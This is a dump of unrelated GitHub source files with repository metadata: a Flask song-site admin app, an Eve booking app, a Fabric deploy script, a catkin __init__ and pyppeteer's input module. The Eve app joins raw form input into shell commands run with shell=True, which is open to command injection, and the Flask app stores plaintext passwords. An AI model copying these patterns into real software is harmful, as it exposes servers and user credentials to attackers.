adminmessages = Contact.query.all()
return render_template("usermessages.html", adminname=adminname, users=adminmessages , params=params)
return redirect("/adminlogin")
@app.route("/admindetails/<string:adminname>")
def admindetails(adminname):
if (adminname in session and adminname in adminsusers):
admins = Admins.query.all()
return render_template("admindetails.html", admins=admins, adminname=adminname, params=params)
return redirect("/adminlogin")
@app.route("/addadmin/<string:adminname>", methods=['GET', 'POST'])
def addadmin(adminname):
if(adminname in session and adminname in adminsusers):
if(adminname==params["mainadmin"]):
params["registermes"] = "enter the admin details"
if request.method == 'POST':
fullname = request.form.get('fullname')
email = request.form.get('email')
username = request.form.get('username')
password = request.form.get('password')
gender = request.form.get('gender')
dob = request.form.get('dob')
repassword = request.form.get('repassword')
if Users.query.filter_by(username=username).first() or Admins.query.filter_by(admin_username=username).first():
params["registermes"] = "username already exists, try another username"
return render_template("addadmin.html", adminname=adminname, params=params)
elif Users.query.filter_by(email=email).first() or Admins.query.filter_by(admin_email=email).first():
params["registermes"] = "email already registered, try another email"
return render_template("addadmin.html", adminname=adminname, params=params)
elif password != repassword:
params["registermes"] = "entered passwords doesn't match, kindly recheck"
return render_template("addadmin.html", adminname=adminname, params=params)
else:
admin = Admins(admin_fullname=fullname, admin_email=email, admin_username=username, admin_password=password, admin_gender=gender, admin_dob=dob)
db.session.add(admin)
db.session.commit()
params["registermes"] = "Succesfully added"
return redirect('/dashboard/' + adminname)
return render_template("addadmin.html", adminname=adminname, params=params)
return redirect("/dashboard/"+adminname)
return redirect("/adminlogin")
@app.route("/userdelete/<string:adminname>/<string:uid>", methods=['GET', 'POST'])
def deleteuser(adminname,uid):
if (adminname in session and adminname in adminsusers):
user = Users.query.filter_by(uid=uid).first()
db.session.delete(user)
db.session.commit()
return redirect("/userdetails/"+adminname)
return redirect("/adminlogin")
@app.route("/admindelete/<string:adminname>/<string:no>", methods=['GET', 'POST'])
def deleteadmin(adminname,no):
if (adminname in session and adminname in adminsusers):
if (adminname==params["mainadmin"]):
admin = Admins.query.filter_by(admin_no=no).first()
db.session.delete(admin)
db.session.commit()
return redirect("/admindetails/"+adminname)
return redirect("/adminlogin")
@app.route("/messagedelete/<string:adminname>/<string:sno>", methods=['GET', 'POST'])
def deletemessage(adminname,sno):
if (adminname in session and adminname in adminsusers):
message = Contact.query.filter_by(sno=sno).first()
db.session.delete(message)
db.session.commit()
return redirect("/usermessages/"+adminname)
return redirect("/adminlogin")
@app.route("/add/<string:adminname>", methods=['GET', 'POST'])
def add(adminname):
if adminname in session and adminname in adminsusers:
if request.method == 'POST':
f = request.files['file']
f2 = request.files['file2']
song_name = request.form.get('song_name')
movie_name = request.form.get('movie_name')
slug = request.form.get('slug')
song_location = f.filename
image_location = f2.filename
lyrics = request.form.get('lyrics')
genre = request.form.get('genre')
singers = request.form.get('singers')
director = request.form.get('director')
lyricist = request.form.get('lyricist')
if f.filename != '':
f.save(os.path.join(app.config['song_folder'], secure_filename(f.filename)))
if f2.filename != '':
f2.save(os.path.join(app.config['image_folder'], secure_filename(f2.filename)))
song = Songs(song_name=song_name, genre=genre, slug=slug, movie_name=movie_name, song_location=song_location, image_location=image_location, song_lyrics=lyrics)
db.session.add(song)
db.session.commit()
details = Songs.query.with_entities(Songs.sid).filter(Songs.song_name == song_name).all()
sid=details[0][0]
trivia = Song_trivia(sid=sid, song_name = song_name, singers_name = singers, music_director = director, lyricist = lyricist)
db.session.add(trivia)
db.session.commit()
return render_template("add.html", adminname=adminname, params=params)
return redirect("/adminlogin")
@app.route("/uploadsong/<string:adminname>")
def upload(adminname):
if (adminname in session):
return render_template("upload.html", adminname=adminname, params=params)
@app.route("/uploader/<string:adminname>", methods=['GET', 'POST'])
def uploader(adminname):
if (adminname in session):
if request.method == 'POST':
f = request.files['file']
if f.filename != '':
f.save(os.path.join(app.config['UPLOAD_FOLDER'], secure_filename(f.filename) ))
return render_template("upload.html", adminname=adminname, params=params)
@app.route("/edit/<string:adminname>/<string:sid>", methods=['GET', 'POST'])
def edit(adminname,sid):
if adminname in session and adminname in adminsusers:
if request.method == 'POST':
song_name = request.form.get('song_name')
movie_name = request.form.get('movie_name')
slug = request.form.get('slug')
song_location = request.form.get('song_location')
genre = request.form.get('genre')
image_location = request.form.get('image_location')
singers = request.form.get('singers')
director = request.form.get('director')
lyricist = request.form.get('lyricist')
trivia = Song_trivia.query.filter_by(sid=sid).first()
trivia.singers_name = singers
trivia.music_director = director
trivia.lyricist = lyricist
db.session.commit()
song = Songs.query.filter_by(sid=sid).first()
song.song_name = song_name
song.slug = slug
song.genre=genre
song.movie_name = movie_name
song.song_location = song_location
song.image_location = image_location
db.session.commit()
return redirect('/edit/' + adminname + "/" + sid)
song = Songs.query.filter_by(sid=sid).first()
trivia = Song_trivia.query.filter_by(sid=sid).first()
return render_template("edit.html", adminname=adminname, trivia=trivia, params=params, song=song)
return redirect("/adminlogin")
@app.route("/about/")
def about():
return render_template("about.html", params=params, username='')
@app.route("/about/<string:username>")
def aboutifuserin(username):
if username in session and username in activeusers:
return render_template("about.html", params=params, username=username)
return redirect("/about/")
@app.route("/adminlogout/<string:adminname>")
def adminlogout(adminname):
if adminname in session and adminname in adminsusers:
session.pop(adminname)
adminsusers.pop(adminname)
return redirect("/")
return redirect("/adminlogin")
@app.route("/contact/", methods=['GET', 'POST'])
def contact():
if request.method == 'POST':
name = request.form.get('name')
email = request.form.get('email')
phone = request.form.get('phone')
message = request.form.get('message')
entry = Contact(name=name, phone_num=phone, mes=message, date=datetime.now(), email=email)
db.session.add(entry)
db.session.commit()
mail.send_message("New message from " + name,
sender=email,
recipients=[params["gmail_username"]],
body=message + "\n" + phone + "\n" + email
)
return render_template("contact.html", params=params, username='')
@app.route("/contact/<string:username>", methods=['GET', 'POST'])
def contactifuserin(username):
if username in session and username in activeusers:
if request.method == 'POST':
name = request.form.get('name')
email = request.form.get('email')
phone = request.form.get('phone')
message = request.form.get('message')
entry = Contact(name=name, phone_num=phone, mes=message, date=datetime.now(), email=email)
db.session.add(entry)
db.session.commit()
mail.send_message("New message from " + name,
sender=email,
recipients=[params["gmail_username"]],
body=message + "\n" + phone + "\n" +email
)
return render_template("contact.html", params=params, username=username)
return redirect("/contact/")
if __name__ == "__main__":
    app.run(debug=True)
|
[
"chikkiyeshwanth@gmail.com"
] |
chikkiyeshwanth@gmail.com
|
f2522ec63de771ae827c9c98f5d1a4d6a50018d2
|
65c81234539ce28ce16bc922b866bdc33b5577af
|
/4kurs/prog/Проект/eve-main/run.py
|
d8746712309b9b5e2b70cf702bf8050db9aa62b8
|
[] |
no_license
|
Serega89Kh/Serega89Kh.github.io
|
7c5ccf73b92540714ae91a38397cca042caa4207
|
1a930146111f4a38494a92bc40f04f2850e5d5fe
|
refs/heads/master
| 2021-06-25T17:36:34.002657
| 2021-06-12T20:39:20
| 2021-06-12T20:39:20
| 148,633,512
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,685
|
py
|
from eve import Eve
from flask import Flask, render_template, request, redirect
import subprocess
name_id = {}
planned = []
inprogress = []
def create_id(resource,items):
item = items[0]
first = item.get('firstname')
last = item.get('lastname')
id = str(item.get('_id'))
if resource == 'Planned':
name_id[first+last] = id
if resource == 'Inprogress':
name_id[first+last+'1'] = id
def create_guest(collections,first,last):
    # shells out to the HTTPie CLI ('http'); note that a plain command string
    # needs shell=True on POSIX, while it works as-is on Windows
    subprocess.check_output('http http://127.0.0.1:5000/'+collections+' firstname='+first+' lastname='+last)
    print('Created guest in '+collections+' first name='+first+' last name='+last)
def delete_guest(collections,id):
    subprocess.check_output('http delete http://127.0.0.1:5000/'+collections+'/'+id, shell=True)
    print('Deleted guest in '+collections+' ID='+id)
def update_guest(collections,id,first,last):
    subprocess.check_output('http put http://127.0.0.1:5000/'+collections+'/'+id+' firstname='+first+' lastname='+last, shell=True)
    print('Updated guest in '+collections+' first name='+first+' last name='+last)
app = Eve(__name__)
@app.route('/book', methods=['POST', 'GET'])
def index():
print(name_id)
return render_template("index.html", planned=planned, inprogress=inprogress)
@app.route('/add', methods=['POST'])
def add():
a = request.form["collection"]
b = request.form["firstname"]
c = request.form["lastname"]
create_guest(a,b,c)
if a == 'Planned':
planned.append(b+' '+c)
if a == 'Inprogress':
inprogress.append(b+' '+c)
return redirect("/book", code=302)
@app.route('/update', methods=['POST'])
def update():
a = request.form["collection1"]
b = request.form["firstname1"]
c = request.form["lastname1"]
d = request.form["collection2"]
e = request.form["firstname2"]
f = request.form["lastname2"]
if a == d:
if d == 'Planned':
planned.remove(b+' '+c)
planned.append(e+' '+f)
g = name_id.get(b+c)
update_guest(d,g,e,f)
name_id.pop(b+c)
name_id[e+f] = g
if d == 'Inprogress':
inprogress.remove(b+' '+c)
inprogress.append(e+' '+f)
g = name_id.get(b+c+'1')
update_guest(d,g,e,f)
name_id.pop(b+c+'1')
name_id[e+f+'1'] = g
if a != d:
if d == 'Planned':
planned.append(e+' '+f)
g = name_id.get(b+c+'1')
update_guest(d,g,e,f)
name_id[e+f] = g
if d == 'Inprogress':
inprogress.append(e+' '+f)
g = name_id.get(b+c)
update_guest(d,g,e,f)
name_id[e+f+'1'] = g
return redirect("/book", code=302)
@app.route('/del', methods=['POST'])
def delete():
a = request.form["collection3"]
b = request.form["firstname3"]
c = request.form["lastname3"]
if a == 'Planned':
planned.remove(b+' '+c)
d = name_id.get(b+c)
delete_guest(a,d)
name_id.pop(b+c)
if a == 'Inprogress':
inprogress.remove(b+' '+c)
d = name_id.get(b+c+'1')
delete_guest(a,d)
name_id.pop(b+c+'1')
return redirect("/book", code=302)
@app.route('/delete_all', methods=['POST'])
def delete_all():
    subprocess.check_output('http delete http://127.0.0.1:5000/Planned', shell=True)
    subprocess.check_output('http delete http://127.0.0.1:5000/Inprogress', shell=True)
return redirect("/book", code=302)
if __name__ == '__main__':
app.on_inserted += create_id
app.run()
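# A minimal alternative sketch (not in the original file, kept commented out),
# assuming the `requests` library: the same REST call without shelling out to
# the httpie CLI. The endpoint URL mirrors the ones used above; everything
# else is assumed.
#
# import requests
#
# def create_guest_requests(collections, first, last):
#     resp = requests.post('http://127.0.0.1:5000/' + collections,
#                          json={'firstname': first, 'lastname': last})
#     resp.raise_for_status()
#     return resp.json()['_id']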
|
[
"noreply@github.com"
] |
Serega89Kh.noreply@github.com
|
9566f13caef2578de4f77597644c40f62124c7c5
|
a3b2c7069c9fab8632b0568db5ab79aceacf9c9c
|
/devel/lib/python2.7/dist-packages/rqt_shell/__init__.py
|
f1db1c731717b00d1205fdcdaf8f8c96af98c62c
|
[] |
no_license
|
tbake0155/bluedragon_workspace
|
08ed85d9de29c178704bd3f883acafae473b175e
|
384d863e00689cf40cde4933447210bbb1ba8636
|
refs/heads/master
| 2021-05-12T01:35:45.896266
| 2018-01-15T14:59:39
| 2018-01-15T14:59:39
| 117,558,143
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,038
|
py
|
# -*- coding: utf-8 -*-
# generated from catkin/cmake/template/__init__.py.in
# keep symbol table as clean as possible by deleting all unnecessary symbols
from os import path as os_path
from sys import path as sys_path
from pkgutil import extend_path
__extended_path = "/home/tim/catkin_ws/src/rqt_common_plugins/rqt_shell/src".split(";")
for p in reversed(__extended_path):
sys_path.insert(0, p)
del p
del sys_path
__path__ = extend_path(__path__, __name__)
del extend_path
__execfiles = []
for p in __extended_path:
src_init_file = os_path.join(p, __name__ + '.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
else:
src_init_file = os_path.join(p, __name__, '__init__.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
del src_init_file
del p
del os_path
del __extended_path
for __execfile in __execfiles:
with open(__execfile, 'r') as __fh:
exec(__fh.read())
del __fh
del __execfile
del __execfiles
|
[
"tbake0155@gmail.com"
] |
tbake0155@gmail.com
|
7de9d2e9c1df80fc40ceb8a1bc81a639a522eb5d
|
90e39e45d469bb5dd9cb36805a88c97f41c147de
|
/3-deploy_web_static.py
|
5b1b40b59f0b93f01a9093e1b1ba1100524e7afe
|
[] |
no_license
|
Noeuclides/AirBnB_clone_v2
|
372b3d01ba76d41a79dca166d6ca7d471749a07d
|
13fac5127af0149e7bef9a94b70e6d2746eeb4fd
|
refs/heads/master
| 2020-07-03T19:16:10.404783
| 2019-09-11T00:42:29
| 2019-09-11T00:42:29
| 202,020,044
| 0
| 2
| null | 2019-08-19T03:08:39
| 2019-08-12T22:44:22
|
Python
|
UTF-8
|
Python
| false
| false
| 1,793
|
py
|
#!/usr/bin/python3
from datetime import datetime
from fabric.api import *
from os import path
'''automate deployment with Fabric
'''
# env.user = 'localhost'
env.hosts = ['35.231.53.89', '35.190.176.186']
def do_pack():
'''making a pack on web_static folder
'''
now = datetime.now()
file = 'web_static_' + now.strftime("%Y%m%d%H%M%S") + '.' + 'tgz'
local("mkdir -p versions")
    check = local("tar -cvzf versions/{file} web_static".format(file=file))
    # fabric's local() does not return None; its result carries a `failed` flag
    if check.failed:
        return None
    return file
def do_deploy(archive_path):
'''distribute an archive to web servers
'''
print(archive_path)
    print(path.exists(archive_path))
    if not path.exists(archive_path):
return False
oper = []
file = archive_path.split("/")
oper.append(put(archive_path, '/tmp'))
folder = file[1].split('.')
print(folder[0])
oper.append(
run("mkdir -p /data/web_static/releases/{folder}".format(
folder=folder[0])))
oper.append(run(
"tar -xzf /tmp/{file} .C /data/web_static/releases/{folder}/".format(
file=file[1], folder=folder[0])))
oper.append(run("rm /tmp/{file}".format(file=file[1])))
oper.append(run("mv /data/web_static/releases/{folder}/web_static/* /data/web_static/releases/{folder}".format(
folder=folder[0])))
oper.append(run(
"rm -rf /data/web_static/releases/{folder}/web_static".format(
folder=folder[0])))
oper.append(run("rm -rf /data/web_static/current"))
oper.append(run(
"ln -s /data/web_static/releases/{folder}/ /data/web_static/current".format(
folder=folder[0])))
print(oper)
    for op in oper:
        # fabric results expose a `failed` attribute; the original
        # `op is False` check could never trigger
        if getattr(op, 'failed', False):
            return False
return True
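def deploy():
    '''chain do_pack and do_deploy (added sketch: the usual final step for a
    3-deploy_web_static.py task, not present in the original file)
    '''
    archive = do_pack()
    if archive is None:
        return False
    return do_deploy("versions/" + archive)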
|
[
"euclidesnoeuclides@gmail.com"
] |
euclidesnoeuclides@gmail.com
|
41b805521cf145dafcff051be669ec825cf821ec
|
19926f1b5672465d1454d225ea937056115f5828
|
/bot/utils/HTML_photo/pyppeteer/pyppeteer/input.py
|
0659c5efde5ea78799d0c78808f6506c4f8c0df9
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
askador/Homework-Scheduler
|
ff974239417ff07599f8170de29e897fd769850b
|
985df5840b5abbb30ce9da381f8d5406e2b3a1f2
|
refs/heads/main
| 2023-06-02T21:33:55.283968
| 2021-06-23T12:09:53
| 2021-06-23T12:09:53
| 379,587,170
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,122
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Keyboard and Mouse module."""
import asyncio
from typing import Any, Dict, TYPE_CHECKING
from bot.utils.HTML_photo.pyppeteer.pyppeteer.connection import CDPSession
from bot.utils.HTML_photo.pyppeteer.pyppeteer.errors import PyppeteerError
from bot.utils.HTML_photo.pyppeteer.pyppeteer.us_keyboard_layout import keyDefinitions
from bot.utils.HTML_photo.pyppeteer.pyppeteer.util import merge_dict
if TYPE_CHECKING:
from typing import Set # noqa: F401
class Keyboard(object):
"""Keyboard class provides as api for managing a virtual keyboard.
The high level api is :meth:`type`, which takes raw characters and
    generates proper keydown, keypress/input, and keyup events on your page.
For finer control, you can use :meth:`down`, :meth:`up`, and
:meth:`sendCharacter` to manually fire events as if they were generated
from a real keyboard.
An example of holding down ``Shift`` in order to select and delete some
text:
.. code::
await page.keyboard.type('Hello, World!')
await page.keyboard.press('ArrowLeft')
await page.keyboard.down('Shift')
for i in ' World':
await page.keyboard.press('ArrowLeft')
await page.keyboard.up('Shift')
await page.keyboard.press('Backspace')
# Result text will end up saying 'Hello!'.
An example of pressing ``A``:
.. code::
await page.keyboard.down('Shift')
await page.keyboard.press('KeyA')
await page.keyboard.up('Shift')
"""
def __init__(self, client: CDPSession) -> None:
self._client = client
self._modifiers = 0
self._pressedKeys: Set[str] = set()
async def down(self, key: str, options: dict = None, **kwargs: Any
) -> None:
"""Dispatch a ``keydown`` event with ``key``.
If ``key`` is a single character and no modifier keys besides ``Shift``
        are being held down, a ``keypress``/``input`` event will also be
generated. The ``text`` option can be specified to force an ``input``
event to be generated.
If ``key`` is a modifier key, like ``Shift``, ``Meta``, or ``Alt``,
subsequent key presses will be sent with that modifier active. To
release the modifier key, use :meth:`up` method.
:arg str key: Name of key to press, such as ``ArrowLeft``.
        :arg dict options: Options can have a ``text`` field; if this option
            is specified, an input event is generated with this text.
.. note::
Modifier keys DO influence :meth:`down`. Holding down ``shift``
will type the text in upper case.
"""
options = merge_dict(options, kwargs)
description = self._keyDescriptionForString(key)
autoRepeat = description['code'] in self._pressedKeys
self._pressedKeys.add(description['code'])
self._modifiers |= self._modifierBit(description['key'])
text = options.get('text')
if text is None:
text = description['text']
await self._client.send('Input.dispatchKeyEvent', {
'type': 'keyDown' if text else 'rawKeyDown',
'modifiers': self._modifiers,
'windowsVirtualKeyCode': description['keyCode'],
'code': description['code'],
'key': description['key'],
'text': text,
'unmodifiedText': text,
'autoRepeat': autoRepeat,
'location': description['location'],
'isKeypad': description['location'] == 3,
})
def _modifierBit(self, key: str) -> int:
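        # (added note) these bit values match the CDP Input domain's
        # `modifiers` mask: Alt=1, Ctrl=2, Meta/Command=4, Shift=8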
if key == 'Alt':
return 1
if key == 'Control':
return 2
if key == 'Meta':
return 4
if key == 'Shift':
return 8
return 0
def _keyDescriptionForString(self, keyString: str) -> Dict: # noqa: C901
shift = self._modifiers & 8
description = {
'key': '',
'keyCode': 0,
'code': '',
'text': '',
'location': 0,
}
definition: Dict = keyDefinitions.get(keyString) # type: ignore
if not definition:
raise PyppeteerError(f'Unknown key: {keyString}')
if 'key' in definition:
description['key'] = definition['key']
if shift and definition.get('shiftKey'):
description['key'] = definition['shiftKey']
if 'keyCode' in definition:
description['keyCode'] = definition['keyCode']
if shift and definition.get('shiftKeyCode'):
description['keyCode'] = definition['shiftKeyCode']
if 'code' in definition:
description['code'] = definition['code']
if 'location' in definition:
description['location'] = definition['location']
if len(description['key']) == 1: # type: ignore
description['text'] = description['key']
if 'text' in definition:
description['text'] = definition['text']
if shift and definition.get('shiftText'):
description['text'] = definition['shiftText']
if self._modifiers & ~8:
description['text'] = ''
return description
async def up(self, key: str) -> None:
"""Dispatch a ``keyup`` event of the ``key``.
:arg str key: Name of key to release, such as ``ArrowLeft``.
"""
description = self._keyDescriptionForString(key)
self._modifiers &= ~self._modifierBit(description['key'])
if description['code'] in self._pressedKeys:
self._pressedKeys.remove(description['code'])
await self._client.send('Input.dispatchKeyEvent', {
'type': 'keyUp',
'modifiers': self._modifiers,
'key': description['key'],
'windowsVirtualKeyCode': description['keyCode'],
'code': description['code'],
'location': description['location'],
})
async def sendCharacter(self, char: str) -> None:
"""Send character into the page.
This method dispatches a ``keypress`` and ``input`` event. This does
not send a ``keydown`` or ``keyup`` event.
.. note::
            Modifier keys DO NOT affect :meth:`sendCharacter`. Holding down
``shift`` will not type the text in upper case.
"""
await self._client.send('Input.insertText', {'text': char})
async def type(self, text: str, options: Dict = None, **kwargs: Any
) -> None:
"""Type characters into a focused element.
This method sends ``keydown``, ``keypress``/``input``, and ``keyup``
event for each character in the ``text``.
To press a special key, like ``Control`` or ``ArrowDown``, use
:meth:`press` method.
:arg str text: Text to type into a focused element.
        :arg dict options: Options can have a ``delay`` (int|float) field,
            which specifies the time to wait between key presses in
            milliseconds. Defaults to 0.
.. note::
            Modifier keys DO NOT affect :meth:`type`. Holding down ``shift``
will not type the text in upper case.
"""
options = merge_dict(options, kwargs)
delay = options.get('delay', 0)
for char in text:
if char in keyDefinitions:
await self.press(char, {'delay': delay})
else:
await self.sendCharacter(char)
if delay:
await asyncio.sleep(delay / 1000)
async def press(self, key: str, options: Dict = None, **kwargs: Any
) -> None:
"""Press ``key``.
If ``key`` is a single character and no modifier keys besides
        ``Shift`` are being held down, a ``keypress``/``input`` event will also be
generated. The ``text`` option can be specified to force an input event
to be generated.
:arg str key: Name of key to press, such as ``ArrowLeft``.
This method accepts the following options:
* ``text`` (str): If specified, generates an input event with this
text.
* ``delay`` (int|float): Time to wait between ``keydown`` and
``keyup``. Defaults to 0.
.. note::
            Modifier keys DO affect :meth:`press`. Holding down ``Shift`` will
type the text in upper case.
"""
options = merge_dict(options, kwargs)
await self.down(key, options)
if 'delay' in options:
await asyncio.sleep(options['delay'] / 1000)
await self.up(key)
class Mouse(object):
"""Mouse class.
The :class:`Mouse` operates in main-frame CSS pixels relative to the
top-left corner of the viewport.
"""
def __init__(self, client: CDPSession, keyboard: Keyboard) -> None:
self._client = client
self._keyboard = keyboard
self._x = 0.0
self._y = 0.0
self._button = 'none'
async def move(self, x: float, y: float, options: dict = None,
**kwargs: Any) -> None:
"""Move mouse cursor (dispatches a ``mousemove`` event).
        Options can accept a ``steps`` (int) field. If this ``steps`` option
        is specified, intermediate ``mousemove`` events are sent. Defaults to 1.
"""
options = merge_dict(options, kwargs)
fromX = self._x
fromY = self._y
self._x = x
self._y = y
steps = options.get('steps', 1)
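        # (added note) linear interpolation: emit `steps` evenly spaced
        # mousemove events between the previous position and (x, y)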
for i in range(1, steps + 1):
x = round(fromX + (self._x - fromX) * (i / steps))
y = round(fromY + (self._y - fromY) * (i / steps))
await self._client.send('Input.dispatchMouseEvent', {
'type': 'mouseMoved',
'button': self._button,
'x': x,
'y': y,
'modifiers': self._keyboard._modifiers,
})
async def click(self, x: float, y: float, options: dict = None,
**kwargs: Any) -> None:
"""Click button at (``x``, ``y``).
Shortcut to :meth:`move`, :meth:`down`, and :meth:`up`.
This method accepts the following options:
* ``button`` (str): ``left``, ``right``, or ``middle``, defaults to
``left``.
* ``clickCount`` (int): defaults to 1.
* ``delay`` (int|float): Time to wait between ``mousedown`` and
``mouseup`` in milliseconds. Defaults to 0.
"""
options = merge_dict(options, kwargs)
await self.move(x, y)
await self.down(options)
if options and options.get('delay'):
await asyncio.sleep(options.get('delay', 0) / 1000)
await self.up(options)
async def down(self, options: dict = None, **kwargs: Any) -> None:
"""Press down button (dispatches ``mousedown`` event).
This method accepts the following options:
* ``button`` (str): ``left``, ``right``, or ``middle``, defaults to
``left``.
* ``clickCount`` (int): defaults to 1.
"""
options = merge_dict(options, kwargs)
self._button = options.get('button', 'left')
await self._client.send('Input.dispatchMouseEvent', {
'type': 'mousePressed',
'button': self._button,
'x': self._x,
'y': self._y,
'modifiers': self._keyboard._modifiers,
'clickCount': options.get('clickCount') or 1,
})
async def up(self, options: dict = None, **kwargs: Any) -> None:
"""Release pressed button (dispatches ``mouseup`` event).
This method accepts the following options:
* ``button`` (str): ``left``, ``right``, or ``middle``, defaults to
``left``.
* ``clickCount`` (int): defaults to 1.
"""
options = merge_dict(options, kwargs)
self._button = 'none'
await self._client.send('Input.dispatchMouseEvent', {
'type': 'mouseReleased',
'button': options.get('button', 'left'),
'x': self._x,
'y': self._y,
'modifiers': self._keyboard._modifiers,
'clickCount': options.get('clickCount') or 1,
})
class Touchscreen(object):
"""Touchscreen class."""
def __init__(self, client: CDPSession, keyboard: Keyboard) -> None:
"""Make new touchscreen object."""
self._client = client
self._keyboard = keyboard
async def tap(self, x: float, y: float) -> None:
"""Tap (``x``, ``y``).
Dispatches a ``touchstart`` and ``touchend`` event.
"""
touchPoints = [{'x': round(x), 'y': round(y)}]
await self._client.send('Input.dispatchTouchEvent', {
'type': 'touchStart',
'touchPoints': touchPoints,
'modifiers': self._keyboard._modifiers,
})
await self._client.send('Input.dispatchTouchEvent', {
'type': 'touchEnd',
'touchPoints': [],
'modifiers': self._keyboard._modifiers,
})
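# A short usage sketch (not part of the original module, kept commented out):
# driving a page with the Keyboard/Mouse/Touchscreen helpers above. `launch`
# and `newPage` come from pyppeteer itself; the URL is a placeholder.
#
# import asyncio
# from pyppeteer import launch
#
# async def demo():
#     browser = await launch()
#     page = await browser.newPage()
#     await page.goto('https://example.com')
#     await page.keyboard.type('Hello', delay=50)
#     await page.mouse.click(100, 200, {'delay': 10})
#     await page.touchscreen.tap(100, 200)
#     await browser.close()
#
# asyncio.get_event_loop().run_until_complete(demo())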
|
[
"streltsov2609@gmail.com"
] |
streltsov2609@gmail.com
|